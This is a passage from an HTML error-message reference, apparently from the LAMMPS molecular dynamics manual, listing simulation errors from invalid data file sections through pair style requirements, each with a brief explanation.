<DD>Atom style does not allow angles.
<DT><I>Invalid data file section: BondBond13 Coeffs</I>
<DD>Atom style does not allow dihedrals.
<DT><I>Invalid data file section: Bonds</I>
<DD>Atom style does not allow bonds.
<DT><I>Invalid data file section: Dihedral Coeffs</I>
<DD>Atom style does not allow dihedrals.
<DT><I>Invalid data file section: Dihedrals</I>
<DD>Atom style does not allow dihedrals.
<DT><I>Invalid data file section: EndBondTorsion Coeffs</I>
<DD>Atom style does not allow dihedrals.
<DT><I>Invalid data file section: Improper Coeffs</I>
<DD>Atom style does not allow impropers.
<DT><I>Invalid data file section: Impropers</I>
<DD>Atom style does not allow impropers.
<DT><I>Invalid data file section: MiddleBondTorsion Coeffs</I>
<DD>Atom style does not allow dihedrals.
<DT><I>Invalid density in Atoms section of data file</I>
<DD>Density value cannot be <= 0.0.
<DT><I>Invalid dihedral style</I>
<DD>The choice of dihedral style is unknown.
<DT><I>Invalid dihedral type in Dihedrals section of data file</I>
<DD>Dihedral type must be positive integer and within range of specified
dihedral types.
<DT><I>Invalid dipole line in data file</I>
<DD>Self-explanatory.
<DT><I>Invalid dipole value</I>
<DD>Self-explanatory.
<DT><I>Invalid dump dcd filename</I>
<DD>Filenames used with the dump dcd style cannot be binary or compressed
or cause multiple files to be written.
<DT><I>Invalid dump frequency</I>
<DD>Dump frequency must be 1 or greater.
<DT><I>Invalid dump style</I>
<DD>The choice of dump style is unknown.
<DT><I>Invalid dump xtc filename</I>
<DD>Filenames used with the dump xtc style cannot be binary or compressed
or cause multiple files to be written.
<DT><I>Invalid dump xyz filename</I>
<DD>Filenames used with the dump xyz style cannot be binary or cause files
to be written by each processor.
<DT><I>Invalid dump_modify threshhold operator</I>
<DD>Operator keyword used for threshold specification in not recognized.
<DT><I>Invalid fix ID in variable formula</I>
<DD>The fix is not recognized.
<DT><I>Invalid fix ave/time off column</I>
<DD>Self-explantory.
<DT><I>Invalid fix box/relax command for a 2d simulation</I>
<DD>Fix box/relax styles involving the z dimension cannot be used in
a 2d simulation.
<DT><I>Invalid fix box/relax command pressure settings</I>
<DD>If multiple dimensions are coupled, those dimensions must be specified.
<DT><I>Invalid fix box/relax pressure settings</I>
<DD>Settings for coupled dimensions must be the same.
<DT><I>Invalid fix nvt/npt/nph command for a 2d simulation</I>
<DD>Cannot control z dimension in a 2d model.
<DT><I>Invalid fix nvt/npt/nph command pressure settings</I>
<DD>If multiple dimensions are coupled, those dimensions must be
specified.
<DT><I>Invalid fix nvt/npt/nph pressure settings</I>
<DD>Settings for coupled dimensions must be the same.
<DT><I>Invalid fix press/berendsen for a 2d simulation</I>
<DD>The z component of pressure cannot be controlled for a 2d model.
<DT><I>Invalid fix press/berendsen pressure settings</I>
<DD>Settings for coupled dimensions must be the same.
<DT><I>Invalid fix style</I>
<DD>The choice of fix style is unknown.
<DT><I>Invalid flag in force field section of restart file</I>
<DD>Unrecognized entry in restart file.
<DT><I>Invalid flag in header section of restart file</I>
<DD>Unrecognized entry in restart file.
<DT><I>Invalid flag in type arrays section of restart file</I>
<DD>Unrecognized entry in restart file.
<DT><I>Invalid frequency in temper command</I>
<DD>Nevery must be > 0.
<DT><I>Invalid group ID in neigh_modify command</I>
<DD>A group ID used in the neigh_modify command does not exist.
<DT><I>Invalid group function in variable formula</I>
<DD>Group function is not recognized.
<DT><I>Invalid group in communicate command</I>
<DD>Self-explanatory.
<DT><I>Invalid improper style</I>
<DD>The choice of improper style is unknown.
<DT><I>Invalid improper type in Impropers section of data file</I>
<DD>Improper type must be positive integer and within range of specified
improper types.
<DT><I>Invalid keyword in angle table parameters</I>
<DD>Self-explanatory.
<DT><I>Invalid keyword in bond table parameters</I>
<DD>Self-explanatory.
<DT><I>Invalid keyword in compute angle/local command</I>
<DD>Self-explanatory.
<DT><I>Invalid keyword in compute bond/local command</I>
<DD>Self-explanatory.
<DT><I>Invalid keyword in compute dihedral/local command</I>
<DD>Self-explanatory.
<DT><I>Invalid keyword in compute improper/local command</I>
<DD>Self-explanatory.
<DT><I>Invalid keyword in compute pair/local command</I>
<DD>Self-explanatory.
<DT><I>Invalid keyword in compute property/atom command</I>
<DD>Self-explanatory.
<DT><I>Invalid keyword in compute property/local command</I>
<DD>Self-explanatory.
<DT><I>Invalid keyword in compute property/molecule command</I>
<DD>Self-explanatory.
<DT><I>Invalid keyword in dump cfg command</I>
<DD>Self-explanatory.
<DT><I>Invalid keyword in pair table parameters</I>
<DD>Keyword used in list of table parameters is not recognized.
<DT><I>Invalid keyword in thermo_style custom command</I>
<DD>One or more specified keywords are not recognized.
<DT><I>Invalid kspace style</I>
<DD>The choice of kspace style is unknown.
<DT><I>Invalid mass line in data file</I>
<DD>Self-explanatory.
<DT><I>Invalid mass value</I>
<DD>Self-explanatory.
<DT><I>Invalid math function in variable formula</I>
<DD>Self-explanatory.
<DT><I>Invalid math/group/special function in variable formula</I>
<DD>Self-explanatory.
<DT><I>Invalid natoms for dump dcd</I>
<DD>Natoms is initially 0 which is not valid for the dump dcd style.
Natoms must be constant for the duration of the simulation.
<DT><I>Invalid natoms for dump xtc</I>
<DD>Natoms is initially 0 which is not valid for the dump xtc style.
<DT><I>Invalid option in lattice command for non-custom style</I>
<DD>Certain lattice keywords are not supported unless the
lattice style is "custom".
<DT><I>Invalid order of forces within respa levels</I>
<DD>For respa, ordering of force computations within respa levels must
obey certain rules. E.g. bonds cannot be compute less frequently than
angles, pairwise forces cannot be computed less frequently than
kspace, etc.
<DT><I>Invalid pair style</I>
<DD>The choice of pair style is unknown.
<DT><I>Invalid pair table cutoff</I>
<DD>Cutoffs in pair_coeff command are not valid with read-in pair table.
<DT><I>Invalid pair table length</I>
<DD>Length of read-in pair table is invalid
<DT><I>Invalid radius in Atoms section of data file</I>
<DD>Radius must be >= 0.0.
<DT><I>Invalid random number seed in fix ttm command</I>
<DD>Random number seed must be > 0.
<DT><I>Invalid random number seed in set command</I>
<DD>Random number seed must be > 0.
<DT><I>Invalid region in group function in variable formula</I>
<DD>Self-explanatory.
<DT><I>Invalid region style</I>
<DD>The choice of region style is unknown.
<DT><I>Invalid replace values in compute reduce</I>
<DD>Self-explanatory.
<DT><I>Invalid seed for Marsaglia random # generator</I>
<DD>The initial seed for this random number generator must be a positive
integer less than or equal to 900 million.
<DT><I>Invalid seed for Park random # generator</I>
<DD>The initial seed for this random number generator must be a positive
integer.
<DT><I>Invalid shape line in data file</I>
<DD>Self-explanatory.
<DT><I>Invalid shape line in data file</I>
<DD>Self-explanatory.
<DT><I>Invalid shape value</I>
<DD>Self-explanatory.
<DT><I>Invalid shear direction for fix wall/gran</I>
<DD>Self-explanatory.
<DT><I>Invalid special function in variable formula</I>
<DD>Self-explanatory.
<DT><I>Invalid style in pair_write command</I>
<DD>Self-explanatory. Check the input script.
<DT><I>Invalid syntax in variable formula</I>
<DD>Self-explanatory.
<DT><I>Invalid t_event in prd command</I>
<DD>Self-explanatory.
<DT><I>Invalid thermo keyword in variable formula</I>
<DD>The keyword is not recognized.
<DT><I>Invalid type for dipole set</I>
<DD>Dipole command must set a type from 1-N where N is the number of atom
types.
<DT><I>Invalid type for mass set</I>
<DD>Mass command must set a type from 1-N where N is the number of atom
types.
<DT><I>Invalid type for shape set</I>
<DD>Atom type is out of bounds.
<DT><I>Invalid value in set command</I>
<DD>The value specified for the setting is invalid, likely because it is
too small or too large.
<DT><I>Invalid variable evaluation in variable formula</I>
<DD>A variable used in a formula could not be evaluated.
<DT><I>Invalid variable in next command</I>
<DD>Self-explanatory.
<DT><I>Invalid variable name in variable formula</I>
<DD>Variable name is not recognized.
<DT><I>Invalid variable name</I>
<DD>Variable name used in an input script line is invalid.
<DT><I>Invalid variable style with next command</I>
<DD>Variable styles <I>equal</I> and <I>world</I> cannot be used in a next
command.
<DT><I>Invalid wiggle direction for fix wall/gran</I>
<DD>Self-explanatory.
<DT><I>Invoked angle equil angle on angle style none</I>
<DD>Self-explanatory.
<DT><I>Invoked angle single on angle style none</I>
<DD>Self-explanatory.
<DT><I>Invoked bond equil distance on bond style none</I>
<DD>Self-explanatory.
<DT><I>Invoked bond single on bond style none</I>
<DD>Self-explanatory.
<DT><I>Invoked pair single on pair style none</I>
<DD>A command (e.g. a dump) attempted to invoke the single() function on a
pair style none, which is illegal. You are probably attempting to
compute per-atom quantities with an undefined pair style.
<DT><I>KSpace style has not yet been set</I>
<DD>Cannot use kspace_modify command until a kspace style is set.
<DT><I>KSpace style is incompatible with Pair style</I>
<DD>Setting a kspace style requires that a pair style with a long-range
Coulombic component be selected.
<DT><I>Keyword %s in MEAM parameter file not recognized</I>
<DD>Self-explanatory.
<DT><I>Kspace style requires atom attribute q</I>
<DD>The atom style defined does not have these attributes.
<DT><I>Label wasn't found in input script</I>
<DD>Self-explanatory.
<DT><I>Lattice orient vectors are not orthogonal</I>
<DD>The three specified lattice orientation vectors must be mutually
orthogonal.
<DT><I>Lattice orient vectors are not right-handed</I>
<DD>The three specified lattice orientation vectors must create a
right-handed coordinate system such that a1 cross a2 = a3.
<DT><I>Lattice primitive vectors are collinear</I>
<DD>The specified lattice primitive vectors do not for a unit cell with
non-zero volume.
<DT><I>Lattice settings are not compatible with 2d simulation</I>
<DD>One or more of the specified lattice vectors has a non-zero z
component.
<DT><I>Lattice spacings are invalid</I>
<DD>Each x,y,z spacing must be > 0.
<DT><I>Lattice style incompatible with simulation dimension</I>
<DD>2d simulation can use sq, sq2, or hex lattice. 3d simulation can use
sc, bcc, or fcc lattice.
<DT><I>Log of zero/negative value in variable formula</I>
<DD>Self-explanatory.
<DT><I>Lost atoms via displace_atoms: original %.15g current %.15g</I>
<DD>The displace_atoms command lost one or more atoms.
<DT><I>Lost atoms via displace_box: original %.15g current %.15g</I>
<DD>The displace_box command lost one or more atoms.
<DT><I>Lost atoms: original %.15g current %.15g</I>
<DD>A thermodynamic computation has detected lost atoms.
<DT><I>MEAM library error %d</I>
<DD>A call to the MEAM Fortran library returned an error.
<DT><I>Mass command before simulation box is defined</I>
<DD>The mass command cannot be used before a read_data, read_restart, or
create_box command.
<DT><I>Min_style command before simulation box is defined</I>
<DD>The min_style command cannot be used before a read_data, read_restart,
or create_box command.
<DT><I>Minimization could not find thermo_pe compute</I>
<DD>This compute is created by the thermo command. It must have been
explicitly deleted by a uncompute command.
<DT><I>Minimize command before simulation box is defined</I>
<DD>The minimize command cannot be used before a read_data, read_restart,
or create_box command.
<DT><I>Mismatched brackets in variable</I>
<DD>Self-explanatory.
<DT><I>Mismatched compute in variable formula</I>
<DD>A compute is referenced incorrectly or a compute that produces per-atom
values is used in an equal-style variable formula.
<DT><I>Mismatched fix in variable formula</I>
<DD>A fix is referenced incorrectly or a fix that produces per-atom
values is used in an equal-style variable formula.
<DT><I>Mismatched variable in variable formula</I>
<DD>A variable is referenced incorrectly or an atom-style variable that
produces per-atom values is used in an equal-style variable
formula.
<DT><I>Molecule count changed in compute com/molecule</I>
<DD>Number of molecules must remain constant over time.
<DT><I>Molecule count changed in compute gyration/molecule</I>
<DD>Number of molecules must remain constant over time.
<DT><I>Molecule count changed in compute msd/molecule</I>
<DD>Number of molecules must remain constant over time.
<DT><I>Molecule count changed in compute property/molecule</I>
<DD>Number of molecules must remain constant over time.
<DT><I>More than one fix deform</I>
<DD>Only one fix deform can be defined at a time.
<DT><I>More than one fix freeze</I>
<DD>Only one of these fixes can be defined, since the granular pair
potentials access it.
<DT><I>More than one fix shake</I>
<DD>Only one fix shake can be defined.
<DT><I>Must define angle_style before Angle Coeffs</I>
<DD>Must use an angle_style command before reading a data file that
defines Angle Coeffs.
<DT><I>Must define angle_style before BondAngle Coeffs</I>
<DD>Must use an angle_style command before reading a data file that
defines Angle Coeffs.
<DT><I>Must define angle_style before BondBond Coeffs</I>
<DD>Must use an angle_style command before reading a data file that
defines Angle Coeffs.
<DT><I>Must define bond_style before Bond Coeffs</I>
<DD>Must use a bond_style command before reading a data file that
defines Bond Coeffs.
<DT><I>Must define dihedral_style before AngleAngleTorsion Coeffs</I>
<DD>Must use a dihedral_style command before reading a data file that
defines AngleAngleTorsion Coeffs.
<DT><I>Must define dihedral_style before AngleTorsion Coeffs</I>
<DD>Must use a dihedral_style command before reading a data file that
defines AngleTorsion Coeffs.
<DT><I>Must define dihedral_style before BondBond13 Coeffs</I>
<DD>Must use a dihedral_style command before reading a data file that
defines BondBond13 Coeffs.
<DT><I>Must define dihedral_style before Dihedral Coeffs</I>
<DD>Must use a dihedral_style command before reading a data file that
defines Dihedral Coeffs.
<DT><I>Must define dihedral_style before EndBondTorsion Coeffs</I>
<DD>Must use a dihedral_style command before reading a data file that
defines EndBondTorsion Coeffs.
<DT><I>Must define dihedral_style before MiddleBondTorsion Coeffs</I>
<DD>Must use a dihedral_style command before reading a data file that
defines MiddleBondTorsion Coeffs.
<DT><I>Must define improper_style before AngleAngle Coeffs</I>
<DD>Must use an improper_style command before reading a data file that
defines AngleAngle Coeffs.
<DT><I>Must define improper_style before Improper Coeffs</I>
<DD>Must use an improper_style command before reading a data file that
defines Improper Coeffs.
<DT><I>Must define pair_style before Pair Coeffs</I>
<DD>Must use a pair_style command before reading a data file that defines
Pair Coeffs.
<DT><I>Must have more than one processor partition to temper</I>
<DD>Cannot use the temper command with only one processor partition. Use
the -partition command-line option.
<DT><I>Must read Atoms before Angles</I>
<DD>The Atoms section of a data file must come before an Angles section.
<DT><I>Must read Atoms before Bonds</I>
<DD>The Atoms section of a data file must come before a Bonds section.
<DT><I>Must read Atoms before Dihedrals</I>
<DD>The Atoms section of a data file must come before a Dihedrals section.
<DT><I>Must read Atoms before Impropers</I>
<DD>The Atoms section of a data file must come before an Impropers
section.
<DT><I>Must read Atoms before Velocities</I>
<DD>The Atoms section of a data file must come before a Velocities
section.
<DT><I>Must set both respa inner and outer</I>
<DD>Cannot use just the inner or outer option with respa without using the
other.
<DT><I>Must specify a region in fix deposit</I>
<DD>The region keyword must be specified with this fix.
<DT><I>Must specify a region in fix pour</I>
<DD>The region keyword must be specified with this fix.
<DT><I>Must use -in switch with multiple partitions</I>
<DD>A multi-partition simulation cannot read the input script from stdin.
The -in command-line option must be used to specify a file.
<DT><I>Must use a block or cylinder region with fix pour</I>
<DD>Self-explanatory.
<DT><I>Must use a block region with fix pour for 2d simulations</I>
<DD>Self-explanatory.
<DT><I>Must use a bond style with TIP4P potential</I>
<DD>TIP4P potentials assume bond lengths in water are constrained
by a fix shake command.
<DT><I>Must use a molecular atom style with fix poems molecule</I>
<DD>Self-explanatory.
<DT><I>Must use a molecular atom style with fix rigid molecule</I>
<DD>Self-explanatory.
<DT><I>Must use a z-axis cylinder with fix pour</I>
<DD>The axis of the cylinder region used with the fix pour command must
be oriented along the z dimension.
<DT><I>Must use an angle style with TIP4P potential</I>
<DD>TIP4P potentials assume angles in water are constrained by a fix shake
command.
<DT><I>Must use atom style with molecule IDs with fix bond/swap</I>
<DD>Self-explanatory.
<DT><I>Must use charged atom style with fix efield</I>
<DD>The atom style being used does not allow atoms to have assigned
charges. Hence it will not work with this fix which generates a force
due to an E-field acting on charge.
<DT><I>Must use molecular atom style with neigh_modify exclude molecule</I>
<DD>The atom style must define a molecule ID to use the exclude
option.
<DT><I>Must use pair_style comb with fix qeq/comb</I>
<DD>Self-explanatory.
<DT><I>Must use variable energy with fix addforce</I>
<DD>Must define an energy vartiable when applyting a dynamic
force during minimization.
<DT><I>NEB command before simulation box is defined</I>
<DD>Self-explanatory.
<DT><I>NEB requires damped dynamics minimizer</I>
<DD>Use a different minimization style.
<DT><I>NEB requires use of fix neb</I>
<DD>Self-explanatory.
<DT><I>Needed topology not in data file</I>
<DD>The header of the data file indicated that bonds or angles or
dihedrals or impropers would be included, but they were not present.
<DT><I>Neigh_modify include group != atom_modify first group</I>
<DD>Self-explanatory.
<DT><I>Neighbor delay must be 0 or multiple of every setting</I>
<DD>The delay and every parameters set via the neigh_modify command are
inconsistent. If the delay setting is non-zero, then it must be a
multiple of the every setting.
<DT><I>Neighbor list overflow, boost neigh_modify one or page</I>
<DD>There are too many neighbors of a single atom. Use the neigh_modify
command to increase the neighbor page size and the max number of
neighbors allowed for one atom.
<DT><I>Neighbor multi not yet enabled for granular</I>
<DD>Self-explanatory.
<DT><I>Neighbor multi not yet enabled for rRESPA</I>
<DD>Self-explanatory.
<DT><I>Neighbor page size must be >= 10x the one atom setting</I>
<DD>This is required to prevent wasting too much memory.
<DT><I>New bond exceeded bonds per atom in fix bond/create</I>
<DD>See the read_data command for info on setting the "extra bond per
atom" header value to allow for additional bonds to be formed.
<DT><I>New bond exceeded special list size in fix bond/create</I>
<DD>See the special_bonds extra command for info on how to leave space in
the special bonds list to allow for additional bonds to be formed.
<DT><I>Newton bond change after simulation box is defined</I>
<DD>The newton command cannot be used to change the newton bond value
after a read_data, read_restart, or create_box command.
<DT><I>No angle style is defined for compute angle/local</I>
<DD>Self-explanatory.
<DT><I>No angles allowed with this atom style</I>
<DD>Self-explanatory. Check data file.
<DT><I>No atoms in data file</I>
<DD>The header of the data file indicated that atoms would be included,
but they were not present.
<DT><I>No basis atoms in lattice</I>
<DD>Basis atoms must be defined for lattice style user.
<DT><I>No bond style is defined for compute bond/local</I>
<DD>Self-explanatory.
<DT><I>No bonds allowed with this atom style</I>
<DD>Self-explanatory. Check data file.
<DT><I>No dihedral style is defined for compute dihedral/local</I>
<DD>Self-explanatory.
<DT><I>No dihedrals allowed with this atom style</I>
<DD>Self-explanatory. Check data file.
<DT><I>No dump custom arguments specified</I>
<DD>The dump custom command requires that atom quantities be specified to
output to dump file.
<DT><I>No dump local arguments specified</I>
<DD>Self-explanatory.
<DT><I>No fix gravity defined for fix pour</I>
<DD>Cannot add poured particles without gravity to move them.
<DT><I>No improper style is defined for compute improper/local</I>
<DD>Self-explanatory.
<DT><I>No impropers allowed with this atom style</I>
<DD>Self-explanatory. Check data file.
<DT><I>No matching element in EAM potential file</I>
<DD>The EAM potential file does not contain elements that match the
requested elements.
<DT><I>No pair style defined for compute group/group</I>
<DD>Cannot calculate group interactions without a pair style defined.
<DT><I>No pair style is defined for compute pair/local</I>
<DD>Self-explanatory.
<DT><I>No pair style is defined for compute property/local</I>
<DD>Self-explanatory.
<DT><I>No rigid bodies defined</I>
<DD>The fix specification did not end up defining any rigid bodies.
<DT><I>Non digit character between brackets in variable</I>
<DD>Self-explantory.
<DT><I>Non integer # of swaps in temper command</I>
<DD>Swap frequency in temper command must evenly divide the total # of
timesteps.
<DT><I>One or more atoms belong to multiple rigid bodies</I>
<DD>Two or more rigid bodies defined by the fix rigid command cannot
contain the same atom.
<DT><I>One or zero atoms in rigid body</I>
<DD>Any rigid body defined by the fix rigid command must contain 2 or more
atoms.
<DT><I>Out of memory on GPGPU</I>
<DD>You are attempting to run with too many atoms on the GPU.
<DT><I>Out of range atoms - cannot compute PPPM</I>
<DD>One or more atoms are attempting to map their charge to a PPPM grid
point that is not owned by a processor. This is likely for one of two
reasons, both of them bad. First, it may mean that an atom near the
boundary of a processor's sub-domain has moved more than 1/2 the
<A HREF = "neighbor.html">neighbor skin distance</A> without neighbor lists being
rebuilt and atoms being migrated to new processors. This also means
you may be missing pairwise interactions that need to be computed.
The solution is to change the re-neighboring criteria via the
<A HREF = "neigh_modify">neigh_modify</A> command. The safest settings are "delay 0
every 1 check yes". Second, it may mean that an atom has moved far
outside a processor's sub-domain or even the entire simulation box.
This indicates bad physics, e.g. due to highly overlapping atoms, too
large a timestep, etc.
<DT><I>Overlapping large/large in pair colloid</I>
<DD>This potential is infinite when there is an overlap.
<DT><I>Overlapping small/large in pair colloid</I>
<DD>This potential is inifinte when there is an overlap.
<DT><I>POEMS fix must come before NPT/NPH fix</I>
<DD>NPT/NPH fix must be defined in input script after all poems fixes,
else the fix contribution to the pressure virial is incorrect.
<DT><I>PPPM grid is too large</I>
<DD>The global PPPM grid is larger than OFFSET in one or more dimensions.
OFFSET is currently set to 4096. You likely need to decrease the
requested precision.
<DT><I>PPPM order cannot be greater than %d</I>
<DD>Self-explanatory.
<DT><I>PPPM order has been reduced to 0</I>
<DD>LAMMPS has attempted to reduce the PPPM order to enable the simulation
to run, but can reduce the order no further. Try increasing the
accuracy of PPPM by reducing the tolerance size, thus inducing a
larger PPPM grid.
<DT><I>PRD command before simulation box is defined</I>
<DD>The prd command cannot be used before a read_data,
read_restart, or create_box command.
<DT><I>PRD nsteps must be multiple of t_event</I>
<DD>Self-explanatory.
<DT><I>PRD t_corr must be multiple of t_event</I>
<DD>Self-explanatory.
<DT><I>Pair coeff for hybrid has invalid style</I>
<DD>Style in pair coeff must have been listed in pair_style command.
<DT><I>Pair cutoff < Respa interior cutoff</I>
<DD>One or more pairwise cutoffs are too short to use with the specified
rRESPA cutoffs.
<DT><I>Pair dipole/cut requires atom attributes q, mu, torque, dipole</I>
<DD>An atom style that specifies these quantities is needed.
<DT><I>Pair distance < table inner cutoff</I>
<DD>Two atoms are closer together than the pairwise table allows.
<DT><I>Pair distance > table outer cutoff</I>
<DD>Two atoms are further apart than the pairwise table allows.
<DT><I>Pair dpd requires ghost atoms store velocity</I>
<DD>Use the communicate vel yes command to enable this.
<DT><I>Pair gayberne cannot be used with atom attribute diameter</I>
<DD>Finite-size particles must be defined with the shape command.
<DT><I>Pair gayberne epsilon a,b,c coeffs are not all set</I>
<DD>Each atom type involved in pair_style gayberne must
have these 3 coefficients set at least once.
<DT><I>Pair gayberne requires atom attributes quat, torque, shape</I>
<DD>An atom style that defines these attributes must be used.
<DT><I>Pair granular requires atom attributes radius, omega, torque</I>
<DD>The atom style defined does not have these attributes.
<DT><I>Pair granular requires ghost atoms store velocity</I>
<DD>Use the communicate vel yes command to enable this.
<DT><I>Pair granular with shear history requires newton pair off</I>
<DD>This is a current restriction of the implementation of pair
granular styles with history.
<DT><I>Pair hybrid sub-style does not support single call</I>
<DD>You are attempting to invoke a single() call on a pair style
that doesn't support it.
<DT><I>Pair hybrid sub-style is not used</I>
<DD>No pair_coeff command used a sub-style specified in the pair_style
command.
<DT><I>Pair inner cutoff < Respa interior cutoff</I>
<DD>One or more pairwise cutoffs are too short to use with the specified
rRESPA cutoffs.
<DT><I>Pair inner cutoff >= Pair outer cutoff</I>
<DD>The specified cutoffs for the pair style are inconsistent.
<DT><I>Pair lubricate cannot be used with atom attributes diameter or rmass</I>
<DD>These attributes override the shape and mass settings, so cannot be
used.
<DT><I>Pair lubricate requires atom attribute omega or angmom</I>
<DD>An atom style that defines these attributes must be used.
<DT><I>Pair lubricate requires atom attributes torque and shape</I>
<DD>An atom style that defines these attributes must be used.
<DT><I>Pair lubricate requires extended particles</I>
<DD>This pair style can only be used for particles with a shape
setting.
<DT><I>Pair lubricate requires ghost atoms store velocity</I>
<DD>Use the communicate vel yes command to enable this.
<DT><I>Pair lubricate requires spherical, mono-disperse particles</I>
<DD>This is a current restriction of this pair style.
<DT><I>Pair peri lattice is not identical in x, y, and z</I>
<DD>The lattice defined by the lattice command must be cubic.
<DT><I>Pair peri requires a lattice be defined</I>
<DD>Use the lattice command for this purpose.
<DT><I>Pair peri requires an atom map, see atom_modify</I>
<DD>Even for atomic systems, an atom map is required to find Peridynamic
bonds. Use the atom_modify command to define one.
<DT><I>Pair resquared cannot be used with atom attribute diameter</I>
<DD>This attribute overrides the shape settings, so cannot be used.
<DT><I>Pair resquared epsilon a,b,c coeffs are not all set</I>
<DD>Self-explanatory.
<DT><I>Pair resquared epsilon and sigma coeffs are not all set</I>
<DD>Self-explanatory.
<DT><I>Pair resquared requires atom attributes quat, torque, shape</I>
<DD>An atom style that defines these attributes must be used.
<DT><I>Pair style AIREBO requires atom IDs</I>
<DD>This is a requirement to use the AIREBO potential.
<DT><I>Pair style AIREBO requires newton pair on</I>
<DD>See the newton command. This is a restriction to use the AIREBO
potential.
<DT><I>Pair style COMB requires atom IDs</I>
<DD>This is a requirement to use the AIREBO potential.
<DT><I>Pair style COMB requires atom attribute q</I>
<DD>Self-explanatory.
<DT><I>Pair style COMB requires newton pair on</I>
<DD>See the newton command. This is a restriction to use the COMB
potential.
<DT><I>Pair style MEAM requires newton pair on</I>
<DD>See the newton command. This is a restriction to use the MEAM
potential.
<DT><I>Pair style Stillinger-Weber requires atom IDs</I>
<DD>This is a requirement to use the SW potential.
<DT><I>Pair style Stillinger-Weber requires newton pair on</I>
<DD>See the newton command. This is a restriction to use the SW
potential.
<DT><I>Pair style Tersoff requires atom IDs</I>
<DD>This is a requirement to use the Tersoff potential.
<DT><I>Pair style Tersoff requires newton pair on</I>
<DD>See the newton command. This is a restriction to use the Tersoff
potential.
<DT><I>Pair style born/coul/long requires atom attribute q</I>
<DD>An atom style that defines this attribute must be used.
<DT><I>Pair style buck/coul/cut requires atom attribute q</I>
<DD>The atom style defined does not have this attribute.
<DT><I>Pair style buck/coul/long requires atom attribute q</I>
<DD>The atom style defined does not have these attributes.
<DT><I>Pair style coul/cut requires atom attribute q</I>
<DD>The atom style defined does not have these attributes.
<DT><I>Pair style does not support bond_style quartic</I>
<DD>The pair style does not have a single() function, so it can
not be invoked by bond_style quartic.
<DT><I>Pair style does not support compute group/group</I>
<DD>The pair_style does not have a single() function, so it cannot be
invokded by the compute group/group command.
<DT><I>Pair style does not support compute pair/local</I>
<DD>The pair style does not have a single() function, so it can
not be invoked by fix bond/swap.
<DT><I>Pair style does not support compute property/local</I>
<DD>The pair style does not have a single() function, so it can
not be invoked by fix bond/swap.
<DT><I>Pair style does not support fix bond/swap</I>
<DD>The pair style does not have a single() function, so it can
not be invoked by fix bond/swap.
<DT><I>Pair style does not support pair_write</I>
<DD>The pair style does not have a single() function, so it can
not be invoked by pair write.
<DT><I>Pair style does not support rRESPA inner/middle/outer</I>
<DD>You are attempting to use rRESPA options with a pair style that
does not support them.
<DT><I>Pair style granular with history requires atoms have IDs</I>
<DD>Atoms in the simulation do not have IDs, so history effects
cannot be tracked by the granular pair potential.
<DT><I>Pair style hybrid cannot have hybrid as an argument</I>
<DD>Self-explanatory.
<DT><I>Pair style hybrid cannot have none as an argument</I>
<DD>Self-explanatory.
<DT><I>Pair style hybrid cannot use same pair style twice</I>
<DD>The sub-style arguments of pair_style hybrid cannot be duplicated.
Check the input script.
<DT><I>Pair style is incompatible with KSpace style</I>
<DD>If a pair style with a long-range Coulombic component is selected,
then a kspace style must also be used.
<DT><I>Pair style lj/charmm/coul/charmm requires atom attribute q</I>
<DD>The atom style defined does not have these attributes.
<DT><I>Pair style lj/charmm/coul/long requires atom attribute q</I>
<DD>The atom style defined does not have these attributes.
<DT><I>Pair style lj/class2/coul/cut requires atom attribute q</I>
<DD>The atom style defined does not have this attribute.
<DT><I>Pair style lj/class2/coul/long requires atom attribute q</I>
<DD>The atom style defined does not have this attribute.
<DT><I>Pair style lj/cut/coul/cut requires atom attribute q</I>
<DD>The atom style defined does not have this attribute.
<DT><I>Pair style lj/cut/coul/long requires atom attribute q</I>
<DD>The atom style defined does not have this attribute.
<DT><I>Pair style lj/cut/coul/long/tip4p requires atom IDs</I>
<DD>There are no atom IDs defined in the system and the TIP4P potential
requires them to find O,H atoms with a water molecule.
<DT><I>Pair style lj/cut/coul/long/tip4p requires atom attribute q</I>
<DD>The atom style defined does not have these attributes.
<DT><I>Pair style lj/cut/coul/long/tip4p requires newton pair on</I>
<DD>This is because the computation of constraint forces within a water
molecule adds forces to atoms owned by other processors.
<DT><I>Pair style lj/gromacs/coul/gromacs requires atom attribute q</I>
<DD>An atom_style with this attribute is needed.
<DT><I>Pair style peri_lps requires atom style peri</I>
<DD>This is because atom style peri stores quantities needed by
the peridynamic potential.
<DT><I>Pair style peri_pmb requires atom style peri</I>
<DD>This is because atom style peri stores quantities needed by
the peridynamic potential.
<DT><I>Pair style reax requires atom IDs</I>
<DD>This is a requirement to use the ReaxFF potential.
<DT><I>Pair style reax requires newton pair on</I>
<DD>This is a requirement to use the ReaxFF potential.
<DT><I>Pair table cutoffs must all be equal to use with KSpace</I>
<DD>When using pair style table with a long-range KSpace solver, the
cutoffs for all atom type pairs must all be the same, since the
long-range solver starts at that cutoff.
<DT><I>Pair table parameters did not set N</I>
<DD>List of pair table parameters must include N setting.
<DT><I>Pair tersoff/zbl requires metal or real units</I>
<DD>This is a current restriction of this pair potential.
<DT><I>Pair yukawa/colloid cannot be used with atom attribute diameter</I>
<DD>Only finite-size particles defined by the shape command can be used.
<DT><I>Pair yukawa/colloid requires atom attribute shape</I>
<DD>Self-explanatory.
<DT><I>Pair yukawa/colloid requires spherical particles</I>
<DD>Self-explanatory.
<DT><I>Pair_coeff command before pair_style is defined</I>
<DD>Self-explanatory.
<DT><I>Pair_coeff command before simulation box is defined</I>
<DD>The pair_coeff command cannot be used before a read_data,
read_restart, or create_box command.
<DT><I>Pair_modify command before pair_style is defined</I>
<DD>Self-explanatory.
<DT><I>Pair_write command before pair_style is defined</I>
<DD>Self-explanatory.
<DT><I>Particle on or inside fix wall surface</I>
<DD>Particles must be "exterior" to the wall in order for energy/force to
be calculated.
<DT><I>Particle on or inside fix wall/region surface</I>
<DD>Particles must be "exterior" to the region surface in order for
energy/force to be calculated.
<DT><I>Per-atom compute in equal-style variable formula</I>
<DD>Equal-style variables cannot use per-atom quantities.
<DT><I>Per-atom energy was not tallied on needed timestep</I>
<DD>You are using a thermo keyword that requires potentials to
have tallied energy, but they didn't on this timestep. See the
variable doc page for ideas on how to make this work.
<DT><I>Per-atom fix in equal-style variable formula</I>
<DD>Equal-style variables cannot use per-atom quantities.
<DT><I>Per-atom virial not available with GPU Gay-Berne</I>
<DD>Self-explanatory.
<DT><I>Per-atom virial was not tallied on needed timestep</I>
<DD>You are using a thermo keyword that requires potentials to have
tallied the virial, but they didn't on this timestep. See the
variable doc page for ideas on how to make this work.
<DT><I>Potential energy ID for fix neb does not exist</I>
